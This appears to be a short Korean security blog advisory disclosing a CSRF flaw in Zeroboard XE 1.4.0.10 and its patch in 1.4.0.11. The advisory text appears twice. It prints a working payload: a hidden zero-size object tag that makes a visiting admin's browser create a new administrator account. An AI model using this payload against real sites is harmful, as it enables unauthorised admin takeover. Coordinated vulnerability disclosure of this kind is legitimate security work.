NVID-2010-01 by ByJJoon @ NullRoot
Zeroboard XE 1.4.0.10 버전에서 관리자 권한을 획득할 수 있는 CSRF 취약점을 확인 하였습니다. 코드 내용은 아래와 같습니다.
<object type="text/x-scriptlet" data="http://test.com/xe/index.php?member_srl= 숫자&user_id=아이디& user_name=사용자이름&nick_name=닉네임&email_address=이메일주소& allow_mailing=Y&is_admin=Y&group_srl_list=2&module=member&act=procMemberAdminInsert" height="0" width="0"></object>
이전에 발견된 취약점은 embed나 img 태그를 이용한 것으로 패치가 되었으나 object 태그에 대한 필터링은 되지 않는 것으로 확인 되었습니다.
지난 주말(4/11)에 해당 취약점에 대해 제로보드 개발자 분께 알려드렸으며 금일(4/15)에 해당 취약점에 대한 패치가 발표되었습니다.
1.4.0.11 보안 패치 배포 : http://www.xpressengine.com/18838863
-EOF-
Zeroboard XE 1.4.0.10 버전에서 관리자 권한을 획득할 수 있는 CSRF 취약점을 확인 하였습니다. 코드 내용은 아래와 같습니다.
<object type="text/x-scriptlet" data="http://test.com/xe/index.php?member_srl= 숫자&user_id=아이디& user_name=사용자이름&nick_name=닉네임&email_address=이메일주소& allow_mailing=Y&is_admin=Y&group_srl_list=2&module=member&act=procMemberAdminInsert" height="0" width="0"></object>
이전에 발견된 취약점은 embed나 img 태그를 이용한 것으로 패치가 되었으나 object 태그에 대한 필터링은 되지 않는 것으로 확인 되었습니다.
지난 주말(4/11)에 해당 취약점에 대해 제로보드 개발자 분께 알려드렸으며 금일(4/15)에 해당 취약점에 대한 패치가 발표되었습니다.
1.4.0.11 보안 패치 배포 : http://www.xpressengine.com/18838863
-EOF-
'해킹/보안' 카테고리의 다른 글
| Zeroboard XE CSRF 취약점 (0) | 2010/04/15 |
|---|---|
| Wargame 사이트 총정리 (4) | 2010/03/24 |
